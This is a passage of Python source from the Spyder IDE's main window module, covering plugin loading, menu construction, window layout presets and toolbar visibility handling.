Console(self, namespace, exitfunc=self.closing, profile=self.profile, multithreaded=self.multithreaded, message=_("Spyder Internal Console\n\n" "This console is used to report application\n" "internal errors and to inspect Spyder\n" "internals with the following commands:\n" " spy.app, spy.window, dir(spy)\n\n" "Please don't use it to run your code\n\n")) self.console.register_plugin() # Language Server Protocol Client initialization self.set_splash(_("Starting Language Server Protocol manager...")) self.lspmanager = LSPManager(self) # Working directory plugin logger.info("Loading working directory...") from spyder.plugins.workingdirectory.plugin import WorkingDirectory self.workingdirectory = WorkingDirectory(self, self.init_workdir, main=self) self.workingdirectory.register_plugin() self.toolbarslist.append(self.workingdirectory.toolbar) # Help plugin if CONF.get('help', 'enable'): self.set_splash(_("Loading help...")) from spyder.plugins.help.plugin import Help self.help = Help(self, css_path=css_path) self.help.register_plugin() # Outline explorer widget if CONF.get('outline_explorer', 'enable'): self.set_splash(_("Loading outline explorer...")) from spyder.plugins.outlineexplorer.plugin import OutlineExplorer self.outlineexplorer = OutlineExplorer(self) self.outlineexplorer.register_plugin() # Editor plugin self.set_splash(_("Loading editor...")) from spyder.plugins.editor.plugin import Editor self.editor = Editor(self) self.editor.register_plugin() # Start LSP client self.set_splash(_("Launching LSP Client for Python...")) self.lspmanager.start_lsp_client('python') # Populating file menu entries quit_action = create_action(self, _("&Quit"), icon=ima.icon('exit'), tip=_("Quit"), triggered=self.console.quit, context=Qt.ApplicationShortcut) self.register_shortcut(quit_action, "_", "Quit") restart_action = create_action(self, _("&Restart"), icon=ima.icon('restart'), tip=_("Restart"), triggered=self.restart, context=Qt.ApplicationShortcut) self.register_shortcut(restart_action, "_", "Restart") self.file_menu_actions += [self.file_switcher_action, self.symbol_finder_action, None, restart_action, quit_action] self.set_splash("") # Namespace browser self.set_splash(_("Loading namespace browser...")) from spyder.plugins.variableexplorer.plugin import VariableExplorer self.variableexplorer = VariableExplorer(self) self.variableexplorer.register_plugin() # Figure browser self.set_splash(_("Loading figure browser...")) from spyder.plugins.plots.plugin import Plots self.plots = Plots(self) self.plots.register_plugin() # History log widget if CONF.get('historylog', 'enable'): self.set_splash(_("Loading history plugin...")) from spyder.plugins.history.plugin import HistoryLog self.historylog = HistoryLog(self) self.historylog.register_plugin() # IPython console self.set_splash(_("Loading IPython console...")) from spyder.plugins.ipythonconsole.plugin import IPythonConsole self.ipyconsole = IPythonConsole(self, css_path=css_path) self.ipyconsole.register_plugin() # Explorer if CONF.get('explorer', 'enable'): self.set_splash(_("Loading file explorer...")) from spyder.plugins.explorer.plugin import Explorer self.explorer = Explorer(self) self.explorer.register_plugin() # Online help widget try: # Qt >= v4.4 from spyder.plugins.onlinehelp.plugin import OnlineHelp except ImportError: # Qt < v4.4 OnlineHelp = None # analysis:ignore if CONF.get('onlinehelp', 'enable') and OnlineHelp is not None: self.set_splash(_("Loading online help...")) self.onlinehelp = OnlineHelp(self) self.onlinehelp.register_plugin() # Project explorer widget self.set_splash(_("Loading project explorer...")) from spyder.plugins.projects.plugin import Projects self.projects = Projects(self) self.projects.register_plugin() self.project_path = self.projects.get_pythonpath(at_start=True) # Find in files if CONF.get('find_in_files', 'enable'): from spyder.plugins.findinfiles.plugin import FindInFiles self.findinfiles = FindInFiles(self) self.findinfiles.register_plugin() # Load other plugins (former external plugins) # TODO: Use this bucle to load all internall plugins and remove # duplicated code other_plugins = ['breakpoints', 'profiler', 'pylint'] for plugin_name in other_plugins: if CONF.get(plugin_name, 'enable'): module = importlib.import_module( 'spyder.plugins.{}'.format(plugin_name)) plugin = module.PLUGIN_CLASS(self) if plugin.check_compatibility()[0]: self.thirdparty_plugins.append(plugin) plugin.register_plugin() # Third-party plugins self.set_splash(_("Loading third-party plugins...")) for mod in get_spyderplugins_mods(): try: plugin = mod.PLUGIN_CLASS(self) if plugin.check_compatibility()[0]: self.thirdparty_plugins.append(plugin) plugin.register_plugin() except Exception as error: print("%s: %s" % (mod, str(error)), file=STDERR) traceback.print_exc(file=STDERR) self.set_splash(_("Setting up main window...")) # Help menu trouble_action = create_action(self, _("Troubleshooting..."), triggered=self.trouble_guide) dep_action = create_action(self, _("Dependencies..."), triggered=self.show_dependencies, icon=ima.icon('advanced')) report_action = create_action(self, _("Report issue..."), icon=ima.icon('bug'), triggered=self.report_issue) support_action = create_action(self, _("Spyder support..."), triggered=self.google_group) self.check_updates_action = create_action(self, _("Check for updates..."), triggered=self.check_updates) # Spyder documentation spyder_doc = 'https://docs.spyder-ide.org/' doc_action = create_action(self, _("Spyder documentation"), icon=ima.icon('DialogHelpButton'), triggered=lambda: programs.start_file(spyder_doc)) self.register_shortcut(doc_action, "_", "spyder documentation") if self.help is not None: tut_action = create_action(self, _("Spyder tutorial"), triggered=self.help.show_tutorial) else: tut_action = None shortcuts_action = create_action(self, _("Shortcuts Summary"), shortcut="Meta+F1", triggered=self.show_shortcuts_dialog) #----- Tours self.tour = tour.AnimatedTour(self) self.tours_menu = QMenu(_("Interactive tours"), self) self.tour_menu_actions = [] # TODO: Only show intro tour for now. When we are close to finish # 3.0, we will finish and show the other tour self.tours_available = tour.get_tours(0) for i, tour_available in enumerate(self.tours_available): self.tours_available[i]['last'] = 0 tour_name = tour_available['name'] def trigger(i=i, self=self): # closure needed! return lambda: self.show_tour(i) temp_action = create_action(self, tour_name, tip="", triggered=trigger()) self.tour_menu_actions += [temp_action] self.tours_menu.addActions(self.tour_menu_actions) self.help_menu_actions = [doc_action, tut_action, shortcuts_action, self.tours_menu, MENU_SEPARATOR, trouble_action, report_action, dep_action, self.check_updates_action, support_action, MENU_SEPARATOR] # Python documentation if get_python_doc_path() is not None: pydoc_act = create_action(self, _("Python documentation"), triggered=lambda: programs.start_file(get_python_doc_path())) self.help_menu_actions.append(pydoc_act) # IPython documentation if self.help is not None: ipython_menu = QMenu(_("IPython documentation"), self) intro_action = create_action(self, _("Intro to IPython"), triggered=self.ipyconsole.show_intro) quickref_action = create_action(self, _("Quick reference"), triggered=self.ipyconsole.show_quickref) guiref_action = create_action(self, _("Console help"), triggered=self.ipyconsole.show_guiref) add_actions(ipython_menu, (intro_action, guiref_action, quickref_action)) self.help_menu_actions.append(ipython_menu) # Windows-only: documentation located in sys.prefix/Doc ipm_actions = [] def add_ipm_action(text, path): """Add installed Python module doc action to help submenu""" # QAction.triggered works differently for PySide and PyQt path = file_uri(path) if not API == 'pyside': slot=lambda _checked, path=path: programs.start_file(path) else: slot=lambda path=path: programs.start_file(path) action = create_action(self, text, icon='%s.png' % osp.splitext(path)[1][1:], triggered=slot) ipm_actions.append(action) sysdocpth = osp.join(sys.prefix, 'Doc') if osp.isdir(sysdocpth): # exists on Windows, except frozen dist. for docfn in os.listdir(sysdocpth): pt = r'([a-zA-Z\_]*)(doc)?(-dev)?(-ref)?(-user)?.(chm|pdf)' match = re.match(pt, docfn) if match is not None: pname = match.groups()[0] if pname not in ('Python', ): add_ipm_action(pname, osp.join(sysdocpth, docfn)) # Installed Python modules submenu (Windows only) if ipm_actions: pymods_menu = QMenu(_("Installed Python modules"), self) add_actions(pymods_menu, ipm_actions) self.help_menu_actions.append(pymods_menu) # Online documentation web_resources = QMenu(_("Online documentation"), self) webres_actions = create_module_bookmark_actions(self, self.BOOKMARKS) webres_actions.insert(2, None) webres_actions.insert(5, None) webres_actions.insert(8, None) add_actions(web_resources, webres_actions) self.help_menu_actions.append(web_resources) # Qt assistant link if sys.platform.startswith('linux') and not PYQT5: qta_exe = "assistant-qt4" else: qta_exe = "assistant" qta_act = create_program_action(self, _("Qt documentation"), qta_exe) if qta_act: self.help_menu_actions += [qta_act, None] # About Spyder about_action = create_action(self, _("About %s...") % "Spyder", icon=ima.icon('MessageBoxInformation'), triggered=self.about) self.help_menu_actions += [MENU_SEPARATOR, about_action] # Status bar widgets from spyder.widgets.status import MemoryStatus, CPUStatus self.mem_status = MemoryStatus(self, status) self.cpu_status = CPUStatus(self, status) self.apply_statusbar_settings() # ----- View # View menu self.plugins_menu = QMenu(_("Panes"), self) self.toolbars_menu = QMenu(_("Toolbars"), self) self.quick_layout_menu = QMenu(_("Window layouts"), self) self.quick_layout_set_menu() self.view_menu.addMenu(self.plugins_menu) # Panes add_actions(self.view_menu, (self.lock_interface_action, self.close_dockwidget_action, self.maximize_action, MENU_SEPARATOR)) self.show_toolbars_action = create_action(self, _("Show toolbars"), triggered=self.show_toolbars, context=Qt.ApplicationShortcut) self.register_shortcut(self.show_toolbars_action, "_", "Show toolbars") self.view_menu.addMenu(self.toolbars_menu) self.view_menu.addAction(self.show_toolbars_action) add_actions(self.view_menu, (MENU_SEPARATOR, self.quick_layout_menu, self.toggle_previous_layout_action, self.toggle_next_layout_action, MENU_SEPARATOR, self.fullscreen_action)) if set_attached_console_visible is not None: cmd_act = create_action(self, _("Attached console window (debugging)"), toggled=set_attached_console_visible) cmd_act.setChecked(is_attached_console_visible()) add_actions(self.view_menu, (MENU_SEPARATOR, cmd_act)) # Adding external tools action to "Tools" menu if self.external_tools_menu_actions: external_tools_act = create_action(self, _("External Tools")) external_tools_act.setMenu(self.external_tools_menu) self.tools_menu_actions += [None, external_tools_act] # Filling out menu/toolbar entries: add_actions(self.file_menu, self.file_menu_actions) add_actions(self.edit_menu, self.edit_menu_actions) add_actions(self.search_menu, self.search_menu_actions) add_actions(self.source_menu, self.source_menu_actions) add_actions(self.run_menu, self.run_menu_actions) add_actions(self.debug_menu, self.debug_menu_actions) add_actions(self.consoles_menu, self.consoles_menu_actions) add_actions(self.projects_menu, self.projects_menu_actions) add_actions(self.tools_menu, self.tools_menu_actions) add_actions(self.external_tools_menu, self.external_tools_menu_actions) add_actions(self.help_menu, self.help_menu_actions) add_actions(self.main_toolbar, self.main_toolbar_actions) add_actions(self.file_toolbar, self.file_toolbar_actions) add_actions(self.edit_toolbar, self.edit_toolbar_actions) add_actions(self.search_toolbar, self.search_toolbar_actions) add_actions(self.source_toolbar, self.source_toolbar_actions) add_actions(self.debug_toolbar, self.debug_toolbar_actions) add_actions(self.run_toolbar, self.run_toolbar_actions) # Apply all defined shortcuts (plugins + 3rd-party plugins) self.apply_shortcuts() # Emitting the signal notifying plugins that main window menu and # toolbar actions are all defined: self.all_actions_defined.emit() # Window set-up logger.info("Setting up window...") self.setup_layout(default=False) # Show and hide shortcuts in menus for Mac. # This is a workaround because we can't disable shortcuts # by setting context=Qt.WidgetShortcut there if sys.platform == 'darwin': for name in ['file', 'edit', 'search', 'source', 'run', 'debug', 'projects', 'tools', 'plugins']: menu_object = getattr(self, name + '_menu') menu_object.aboutToShow.connect( lambda name=name: self.show_shortcuts(name)) menu_object.aboutToHide.connect( lambda name=name: self.hide_shortcuts(name)) if self.splash is not None: self.splash.hide() # Enabling tear off for all menus except help menu if CONF.get('main', 'tear_off_menus'): for child in self.menuBar().children(): if isinstance(child, QMenu) and child != self.help_menu: child.setTearOffEnabled(True) # Menu about to show for child in self.menuBar().children(): if isinstance(child, QMenu): try: child.aboutToShow.connect(self.update_edit_menu) child.aboutToShow.connect(self.update_search_menu) except TypeError: pass logger.info("*** End of MainWindow setup ***") self.is_starting_up = False def post_visible_setup(self): """Actions to be performed only after the main window's `show` method was triggered""" self.restore_scrollbar_position.emit() # [Workaround for Issue 880] # QDockWidget objects are not painted if restored as floating # windows, so we must dock them before showing the mainwindow, # then set them again as floating windows here. for widget in self.floating_dockwidgets: widget.setFloating(True) # In MacOS X 10.7 our app is not displayed after initialized (I don't # know why because this doesn't happen when started from the terminal), # so we need to resort to this hack to make it appear. if running_in_mac_app(): idx = __file__.index(MAC_APP_NAME) app_path = __file__[:idx] subprocess.call(['open', app_path + MAC_APP_NAME]) # Server to maintain just one Spyder instance and open files in it if # the user tries to start other instances with # $ spyder foo.py if (CONF.get('main', 'single_instance') and not self.new_instance and self.open_files_server): t = threading.Thread(target=self.start_open_files_server) t.setDaemon(True) t.start() # Connect the window to the signal emmited by the previous server # when it gets a client connected to it self.sig_open_external_file.connect(self.open_external_file) # Create Plugins and toolbars submenus self.create_plugins_menu() self.create_toolbars_menu() # Update toolbar visibility status self.toolbars_visible = CONF.get('main', 'toolbars_visible') self.load_last_visible_toolbars() # Update lock status self.lock_interface_action.setChecked(self.interface_locked) # Hide Internal Console so that people don't use it instead of # the External or IPython ones if self.console.dockwidget.isVisible() and DEV is None: self.console.toggle_view_action.setChecked(False) self.console.dockwidget.hide() # Show Help and Consoles by default plugins_to_show = [self.ipyconsole] if self.help is not None: plugins_to_show.append(self.help) for plugin in plugins_to_show: if plugin.dockwidget.isVisible(): plugin.dockwidget.raise_() # Show history file if no console is visible if not self.ipyconsole.isvisible: self.historylog.add_history(get_conf_path('history.py')) if self.open_project: self.projects.open_project(self.open_project) else: # Load last project if a project was active when Spyder # was closed self.projects.reopen_last_project() # If no project is active, load last session if self.projects.get_active_project() is None: self.editor.setup_open_files() # Check for spyder updates if DEV is None and CONF.get('main', 'check_updates_on_startup'): self.give_updates_feedback = False self.check_updates(startup=True) # Show dialog with missing dependencies self.report_missing_dependencies() # Raise the menuBar to the top of the main window widget's stack # (Fixes issue 3887) self.menuBar().raise_() self.is_setting_up = False def set_window_title(self): """Set window title.""" if DEV is not None: title = u"Spyder %s (Python %s.%s)" % (__version__, sys.version_info[0], sys.version_info[1]) else: title = u"Spyder (Python %s.%s)" % (sys.version_info[0], sys.version_info[1]) if get_debug_level(): title += u" [DEBUG MODE %d]" % get_debug_level() if self.window_title is not None: title += u' -- ' + to_text_string(self.window_title) if self.projects is not None: path = self.projects.get_active_project_path() if path: path = path.replace(get_home_dir(), u'~') title = u'{0} - {1}'.format(path, title) self.base_title = title self.setWindowTitle(self.base_title) def report_missing_dependencies(self): """Show a QMessageBox with a list of missing hard dependencies""" missing_deps = dependencies.missing_dependencies() if missing_deps: QMessageBox.critical(self, _('Error'), _("<b>You have missing dependencies!</b>" "<br><br><tt>%s</tt><br><br>" "<b>Please install them to avoid this message.</b>" "<br><br>" "<i>Note</i>: Spyder could work without some of these " "dependencies, however to have a smooth experience when " "using Spyder we <i>strongly</i> recommend you to install " "all the listed missing dependencies.<br><br>" "Failing to install these dependencies might result in bugs. " "Please be sure that any found bugs are not the direct " "result of missing dependencies, prior to reporting a new " "issue." ) % missing_deps, QMessageBox.Ok) def load_window_settings(self, prefix, default=False, section='main'): """Load window layout settings from userconfig-based configuration with *prefix*, under *section* default: if True, do not restore inner layout""" get_func = CONF.get_default if default else CONF.get window_size = get_func(section, prefix+'size') prefs_dialog_size = get_func(section, prefix+'prefs_dialog_size') if default: hexstate = None else: hexstate = get_func(section, prefix+'state', None) pos = get_func(section, prefix+'position') # It's necessary to verify if the window/position value is valid # with the current screen. See issue 3748 width = pos[0] height = pos[1] screen_shape = QApplication.desktop().geometry() current_width = screen_shape.width() current_height = screen_shape.height() if current_width < width or current_height < height: pos = CONF.get_default(section, prefix+'position') is_maximized = get_func(section, prefix+'is_maximized') is_fullscreen = get_func(section, prefix+'is_fullscreen') return hexstate, window_size, prefs_dialog_size, pos, is_maximized, \ is_fullscreen def get_window_settings(self): """Return current window settings Symetric to the 'set_window_settings' setter""" window_size = (self.window_size.width(), self.window_size.height()) is_fullscreen = self.isFullScreen() if is_fullscreen: is_maximized = self.maximized_flag else: is_maximized = self.isMaximized() pos = (self.window_position.x(), self.window_position.y()) prefs_dialog_size = (self.prefs_dialog_size.width(), self.prefs_dialog_size.height()) hexstate = qbytearray_to_str(self.saveState()) return (hexstate, window_size, prefs_dialog_size, pos, is_maximized, is_fullscreen) def set_window_settings(self, hexstate, window_size, prefs_dialog_size, pos, is_maximized, is_fullscreen): """Set window settings Symetric to the 'get_window_settings' accessor""" self.setUpdatesEnabled(False) self.window_size = QSize(window_size[0], window_size[1]) # width,height self.prefs_dialog_size = QSize(prefs_dialog_size[0], prefs_dialog_size[1]) # width,height self.window_position = QPoint(pos[0], pos[1]) # x,y self.setWindowState(Qt.WindowNoState) self.resize(self.window_size) self.move(self.window_position) # Window layout if hexstate: self.restoreState( QByteArray().fromHex( str(hexstate).encode('utf-8')) ) # [Workaround for Issue 880] # QDockWidget objects are not painted if restored as floating # windows, so we must dock them before showing the mainwindow. for widget in self.children(): if isinstance(widget, QDockWidget) and widget.isFloating(): self.floating_dockwidgets.append(widget) widget.setFloating(False) # Is fullscreen? if is_fullscreen: self.setWindowState(Qt.WindowFullScreen) self.__update_fullscreen_action() # Is maximized? if is_fullscreen: self.maximized_flag = is_maximized elif is_maximized: self.setWindowState(Qt.WindowMaximized) self.setUpdatesEnabled(True) def save_current_window_settings(self, prefix, section='main', none_state=False): """Save current window settings with *prefix* in the userconfig-based configuration, under *section*""" win_size = self.window_size prefs_size = self.prefs_dialog_size CONF.set(section, prefix+'size', (win_size.width(), win_size.height())) CONF.set(section, prefix+'prefs_dialog_size', (prefs_size.width(), prefs_size.height())) CONF.set(section, prefix+'is_maximized', self.isMaximized()) CONF.set(section, prefix+'is_fullscreen', self.isFullScreen()) pos = self.window_position CONF.set(section, prefix+'position', (pos.x(), pos.y())) self.maximize_dockwidget(restore=True)# Restore non-maximized layout if none_state: CONF.set(section, prefix + 'state', None) else: qba = self.saveState() CONF.set(section, prefix + 'state', qbytearray_to_str(qba)) CONF.set(section, prefix+'statusbar', not self.statusBar().isHidden()) def tabify_plugins(self, first, second): """Tabify plugin dockwigdets""" self.tabifyDockWidget(first.dockwidget, second.dockwidget) # --- Layouts def setup_layout(self, default=False): """Setup window layout""" prefix = 'window' + '/' settings = self.load_window_settings(prefix, default) hexstate = settings[0] self.first_spyder_run = False if hexstate is None: # First Spyder execution: self.setWindowState(Qt.WindowMaximized) self.first_spyder_run = True self.setup_default_layouts('default', settings) # Now that the initial setup is done, copy the window settings, # except for the hexstate in the quick layouts sections for the # default layouts. # Order and name of the default layouts is found in config.py section = 'quick_layouts' get_func = CONF.get_default if default else CONF.get order = get_func(section, 'order') # restore the original defaults if reset layouts is called if default: CONF.set(section, 'active', order) CONF.set(section, 'order', order) CONF.set(section, 'names', order) for index, name, in enumerate(order): prefix = 'layout_{0}/'.format(index) self.save_current_window_settings(prefix, section, none_state=True) # store the initial layout as the default in spyder prefix = 'layout_default/' section = 'quick_layouts' self.save_current_window_settings(prefix, section, none_state=True) self.current_quick_layout = 'default' # Regenerate menu self.quick_layout_set_menu() self.set_window_settings(*settings) for plugin in (self.widgetlist + self.thirdparty_plugins): try: plugin.initialize_plugin_in_mainwindow_layout() except Exception as error: print("%s: %s" % (plugin, str(error)), file=STDERR) traceback.print_exc(file=STDERR) def setup_default_layouts(self, index, settings): """Setup default layouts when run for the first time""" self.maximize_dockwidget(restore=True) self.set_window_settings(*settings) self.setUpdatesEnabled(False) # IMPORTANT: order has to be the same as defined in the config file MATLAB, RSTUDIO, VERTICAL, HORIZONTAL = range(self.DEFAULT_LAYOUTS) # define widgets locally editor = self.editor console_ipy = self.ipyconsole console_int = self.console outline = self.outlineexplorer explorer_project = self.projects explorer_file = self.explorer explorer_variable = self.variableexplorer plots = self.plots history = self.historylog finder = self.findinfiles help_plugin = self.help helper = self.onlinehelp plugins = self.thirdparty_plugins global_hidden_widgets = [finder, console_int, explorer_project, helper] + plugins global_hidden_toolbars = [self.source_toolbar, self.edit_toolbar, self.search_toolbar] # Layout definition # layouts are organized by columns, each colum is organized by rows # widths have to add 1.0, height per column have to add 1.0 # Spyder Default Initial Layout s_layout = {'widgets': [ # column 0 [[explorer_project]], # column 1 [[editor]], # column 2 [[outline]], # column 3 [[help_plugin, explorer_variable, plots, helper, explorer_file, finder] + plugins, [console_int, console_ipy, history]] ], 'width fraction': [0.0, # column 0 width 0.55, # column 1 width 0.0, # column 2 width 0.45], # column 3 width 'height fraction': [[1.0], # column 0, row heights [1.0], # column 1, row heights [1.0], # column 2, row heights [0.46, 0.54]], # column 3, row heights 'hidden widgets': [outline], 'hidden toolbars': [], } r_layout = {'widgets': [ # column 0 [[editor], [console_ipy, console_int]], # column 1 [[explorer_variable, plots, history, outline, finder] + plugins, [explorer_file, explorer_project, help_plugin, helper]] ], 'width fraction': [0.55, # column 0 width 0.45], # column 1 width 'height fraction': [[0.55, 0.45], # column 0, row heights [0.55, 0.45]], # column 1, row heights 'hidden widgets': [outline], 'hidden toolbars': [], } # Matlab m_layout = {'widgets': [ # column 0 [[explorer_file, explorer_project], [outline]], # column 1 [[editor], [console_ipy, console_int]], # column 2 [[explorer_variable, plots, finder] + plugins, [history, help_plugin, helper]] ], 'width fraction': [0.20, # column 0 width 0.40, # column 1 width 0.40], # column 2 width 'height fraction': [[0.55, 0.45], # column 0, row heights [0.55, 0.45], # column 1, row heights [0.55, 0.45]], # column 2, row heights 'hidden widgets': [], 'hidden toolbars': [], } # Vertically split v_layout = {'widgets': [ # column 0 [[editor], [console_ipy, console_int, explorer_file, explorer_project, help_plugin, explorer_variable, plots, history, outline, finder, helper] + plugins] ], 'width fraction': [1.0], # column 0 width 'height fraction': [[0.55, 0.45]], # column 0, row heights 'hidden widgets': [outline], 'hidden toolbars': [], } # Horizontally split h_layout = {'widgets': [ # column 0 [[editor]], # column 1 [[console_ipy, console_int, explorer_file, explorer_project, help_plugin, explorer_variable, plots, history, outline, finder, helper] + plugins] ], 'width fraction': [0.55, # column 0 width 0.45], # column 1 width 'height fraction': [[1.0], # column 0, row heights [1.0]], # column 1, row heights 'hidden widgets': [outline], 'hidden toolbars': [] } # Layout selection layouts = {'default': s_layout, RSTUDIO: r_layout, MATLAB: m_layout, VERTICAL: v_layout, HORIZONTAL: h_layout} layout = layouts[index] widgets_layout = layout['widgets'] widgets = [] for column in widgets_layout : for row in column: for widget in row: if widget is not None: widgets.append(widget) # Make every widget visible for widget in widgets: widget.toggle_view(True) action = widget.toggle_view_action action.setChecked(widget.dockwidget.isVisible()) # Set the widgets horizontally for i in range(len(widgets) - 1): first, second = widgets[i], widgets[i+1] if first is not None and second is not None: self.splitDockWidget(first.dockwidget, second.dockwidget, Qt.Horizontal) # Arrange rows vertically for column in widgets_layout : for i in range(len(column) - 1): first_row, second_row = column[i], column[i+1] if first_row is not None and second_row is not None: self.splitDockWidget(first_row[0].dockwidget, second_row[0].dockwidget, Qt.Vertical) # Tabify for column in widgets_layout : for row in column: for i in range(len(row) - 1): first, second = row[i], row[i+1] if first is not None and second is not None: self.tabify_plugins(first, second) # Raise front widget per row row[0].dockwidget.show() row[0].dockwidget.raise_() # Hide toolbars hidden_toolbars = global_hidden_toolbars + layout['hidden toolbars'] for toolbar in hidden_toolbars: if toolbar is not None: toolbar.close() # Hide widgets hidden_widgets = global_hidden_widgets + layout['hidden widgets'] for widget in hidden_widgets: if widget is not None: widget.dockwidget.close() # set the width and height self._layout_widget_info = [] width, height = self.window_size.width(), self.window_size.height() # fix column width # for c in range(len(widgets_layout)): # widget = widgets_layout[c][0][0].dockwidget # min_width, max_width = widget.minimumWidth(), widget.maximumWidth() # info = {'widget': widget, # 'min width': min_width, # 'max width': max_width} # self._layout_widget_info.append(info) # new_width = int(layout['width fraction'][c] * width * 0.95) # widget.setMinimumWidth(new_width) # widget.setMaximumWidth(new_width) # widget.updateGeometry() # fix column height for c, column in enumerate(widgets_layout): for r in range(len(column) - 1): widget = column[r][0] dockwidget = widget.dockwidget dock_min_h = dockwidget.minimumHeight() dock_max_h = dockwidget.maximumHeight() info = {'widget': widget, 'dock min height': dock_min_h, 'dock max height': dock_max_h} self._layout_widget_info.append(info) # The 0.95 factor is to adjust height based on usefull # estimated area in the window new_height = int(layout['height fraction'][c][r]*height*0.95) dockwidget.setMinimumHeight(new_height) dockwidget.setMaximumHeight(new_height) self._custom_layout_timer = QTimer(self) self._custom_layout_timer.timeout.connect(self.layout_fix_timer) self._custom_layout_timer.setSingleShot(True) self._custom_layout_timer.start(5000) def layout_fix_timer(self): """Fixes the height of docks after a new layout is set.""" info = self._layout_widget_info for i in info: dockwidget = i['widget'].dockwidget if 'dock min width' in i: dockwidget.setMinimumWidth(i['dock min width']) dockwidget.setMaximumWidth(i['dock max width']) if 'dock min height' in i: dockwidget.setMinimumHeight(i['dock min height']) dockwidget.setMaximumHeight(i['dock max height']) dockwidget.updateGeometry() self.setUpdatesEnabled(True) @Slot() def toggle_previous_layout(self): """ """ self.toggle_layout('previous') @Slot() def toggle_next_layout(self): """ """ self.toggle_layout('next') def toggle_layout(self, direction='next'): """ """ get = CONF.get names = get('quick_layouts', 'names') order = get('quick_layouts', 'order') active = get('quick_layouts', 'active') if len(active) == 0: return layout_index = ['default'] for name in order: if name in active: layout_index.append(names.index(name)) current_layout = self.current_quick_layout dic = {'next': 1, 'previous': -1} if current_layout is None: # Start from default current_layout = 'default' if current_layout in layout_index: current_index = layout_index.index(current_layout) else: current_index = 0 new_index = (current_index + dic[direction]) % len(layout_index) self.quick_layout_switch(layout_index[new_index]) def quick_layout_set_menu(self): """ """ get = CONF.get names = get('quick_layouts', 'names') order = get('quick_layouts', 'order') active = get('quick_layouts', 'active') ql_actions = [] ql_actions = [create_action(self, _('Spyder Default Layout'), triggered=lambda: self.quick_layout_switch('default'))] for name in order: if name in active: index = names.index(name) # closure required so lambda works with the default parameter def trigger(i=index, self=self): return lambda: self.quick_layout_switch(i) qli_act = create_action(self, name, triggered=trigger()) # closure above replaces the following which stopped working # qli_act = create_action(self, name, triggered=lambda i=index: # self.quick_layout_switch(i) ql_actions += [qli_act] self.ql_save = create_action(self, _("Save current layout"), triggered=lambda: self.quick_layout_save(), context=Qt.ApplicationShortcut) self.ql_preferences = create_action(self, _("Layout preferences"), triggered=lambda: self.quick_layout_settings(), context=Qt.ApplicationShortcut) self.ql_reset = create_action(self, _('Reset to spyder default'), triggered=self.reset_window_layout) self.register_shortcut(self.ql_save, "_", "Save current layout") self.register_shortcut(self.ql_preferences, "_", "Layout preferences") ql_actions += [None] ql_actions += [self.ql_save, self.ql_preferences, self.ql_reset] self.quick_layout_menu.clear() add_actions(self.quick_layout_menu, ql_actions) if len(order) == 0: self.ql_preferences.setEnabled(False) else: self.ql_preferences.setEnabled(True) @Slot() def reset_window_layout(self): """Reset window layout to default""" answer = QMessageBox.warning(self, _("Warning"), _("Window layout will be reset to default settings: " "this affects window position, size and dockwidgets.\n" "Do you want to continue?"), QMessageBox.Yes | QMessageBox.No) if answer == QMessageBox.Yes: self.setup_layout(default=True) def quick_layout_save(self): """Save layout dialog""" get = CONF.get set_ = CONF.set names = get('quick_layouts', 'names') order = get('quick_layouts', 'order') active = get('quick_layouts', 'active') dlg = self.dialog_layout_save(self, names) if dlg.exec_(): name = dlg.combo_box.currentText() if name in names: answer = QMessageBox.warning(self, _("Warning"), _("Layout <b>%s</b> will be \ overwritten. Do you want to \ continue?") % name, QMessageBox.Yes | QMessageBox.No) index = order.index(name) else: answer = True if None in names: index = names.index(None) names[index] = name else: index = len(names) names.append(name) order.append(name) # Always make active a new layout even if it overwrites an inactive # layout if name not in active: active.append(name) if answer: self.save_current_window_settings('layout_{}/'.format(index), section='quick_layouts') set_('quick_layouts', 'names', names) set_('quick_layouts', 'order', order) set_('quick_layouts', 'active', active) self.quick_layout_set_menu() def quick_layout_settings(self): """Layout settings dialog""" get = CONF.get set_ = CONF.set section = 'quick_layouts' names = get(section, 'names') order = get(section, 'order') active = get(section, 'active') dlg = self.dialog_layout_settings(self, names, order, active) if dlg.exec_(): set_(section, 'names', dlg.names) set_(section, 'order', dlg.order) set_(section, 'active', dlg.active) self.quick_layout_set_menu() def quick_layout_switch(self, index): """Switch to quick layout number *index*""" section = 'quick_layouts' try: settings = self.load_window_settings('layout_{}/'.format(index), section=section) (hexstate, window_size, prefs_dialog_size, pos, is_maximized, is_fullscreen) = settings # The defaults layouts will always be regenerated unless there was # an overwrite, either by rewriting with same name, or by deleting # and then creating a new one if hexstate is None: # The value for hexstate shouldn't be None for a custom saved # layout (ie, where the index is greater than the number of # defaults). See issue 6202. if index != 'default' and index >= self.DEFAULT_LAYOUTS: QMessageBox.critical( self, _("Warning"), _("Error opening the custom layout. Please close" " Spyder and try again. If the issue persists," " then you must use 'Reset to Spyder default' " "from the layout menu.")) return self.setup_default_layouts(index, settings) except cp.NoOptionError: QMessageBox.critical(self, _("Warning"), _("Quick switch layout #%s has not yet " "been defined.") % str(index)) return # TODO: is there any real use in calling the previous layout # setting? # self.previous_layout_settings = self.get_window_settings() self.set_window_settings(*settings) self.current_quick_layout = index # make sure the flags are correctly set for visible panes for plugin in (self.widgetlist + self.thirdparty_plugins): action = plugin.toggle_view_action action.setChecked(plugin.dockwidget.isVisible()) # --- Show/Hide toolbars def _update_show_toolbars_action(self): """Update the text displayed in the menu entry.""" if self.toolbars_visible: text = _("Hide toolbars") tip = _("Hide toolbars") else: text = _("Show toolbars") tip = _("Show toolbars") self.show_toolbars_action.setText(text) self.show_toolbars_action.setToolTip(tip) def save_visible_toolbars(self): """Saves the name of the visible toolbars in the .ini file.""" toolbars = [] for toolbar in self.visible_toolbars: toolbars.append(toolbar.objectName()) CONF.set('main', 'last_visible_toolbars', toolbars) def get_visible_toolbars(self): """Collects the visible toolbars.""" toolbars = [] for toolbar in self.toolbarslist: if toolbar.toggleViewAction().isChecked(): toolbars.append(toolbar) self.visible_toolbars = toolbars def load_last_visible_toolbars(self): """Loads the last visible toolbars from the .ini file.""" toolbars_names = CONF.get('main', 'last_visible_toolbars', default=[]) if toolbars_names: dic = {} for toolbar in self.toolbarslist: dic[toolbar.objectName()] = toolbar toolbars = [] for name in toolbars_names: if name in dic: toolbars.append(dic[name]) self.visible_toolbars = toolbars else: self.get_visible_toolbars() self._update_show_toolbars_action() @Slot() def show_toolbars(self): """Show/Hides toolbars.""" value = not self.toolbars_visible CONF.set('main', 'toolbars_visible', value) if value: self.save_visible_toolbars() else: self.get_visible_toolbars() for toolbar in self.visible_toolbars: toolbar.toggleViewAction().setChecked(value) toolbar.setVisible(value) self.toolbars_visible = value 